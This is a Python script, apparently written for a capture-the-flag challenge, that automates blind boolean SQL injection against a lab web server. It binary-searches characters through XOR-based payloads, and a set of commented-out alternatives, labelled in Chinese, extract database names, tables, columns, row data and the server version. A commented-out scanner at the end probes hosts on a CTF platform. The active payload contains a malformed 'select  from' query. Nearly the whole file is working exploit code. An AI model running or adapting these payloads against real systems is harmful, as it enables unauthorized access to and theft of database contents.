import requests
import time

url = "http://172.19.14.20:27066/?id="
name = ''

for i in range(1, 1000):
    min = 32
    max = 128
    while min < max:
        mid = (min + max) // 2
        # payload = f"2^(ascii(substr(database(),{i},1))>{mid})#"  # 查库名
        payload = f"2^(ascii(substr((select  from mysql.innodb_table_stats limit 1,1),{i},1))>{mid})#"  # 查库名
        # payload=f'2^(ascii(substr((select(table_name)from(sys.schema_table_statistics_with_buffer)where(table_schema)="ctf" limit 0,1),{i},1))>{mid})#'        #查表名
        # payload=f'1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)="img_path"),{i},1))>{mid})#'      #查列名
        # payload=f"2^(ascii(substr((select(table_name)from(mysql.innodb_table_stats)),{i},1))>{mid})#"       #查数据
        # payload = f"2^(ascii(substr((select(id)from(users)limit {a},1),{i},1))>{mid})#"  # 查数据
        # payload=f'1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),{i},1))>{mid})#' #查所有数据库
        # payload = f"2^(ascii(substr(version(),{i},1))>{mid})#" #查用户权限
        time.sleep(0.1)  # 加上时间延迟，防止请求太快注入出现错误
        response = requests.get(url=url + payload)
        if 'geshuai@huse.com' in response.text:
            min = mid + 1
        else:
            max = mid
    if min != 32:
        name += chr(min)
    else:
        break
    print(name)
# import requests
#
# for i in range(1,255):
#     url="http://192-168-1-"+str(i)+".pvp3558.bugku.cn"
#     # print(url)
#     try:
#         r=requests.get(url=url)
#         if r.status_code==200:
#             print("检测到存活ip："+url)
#     except:
#         pass
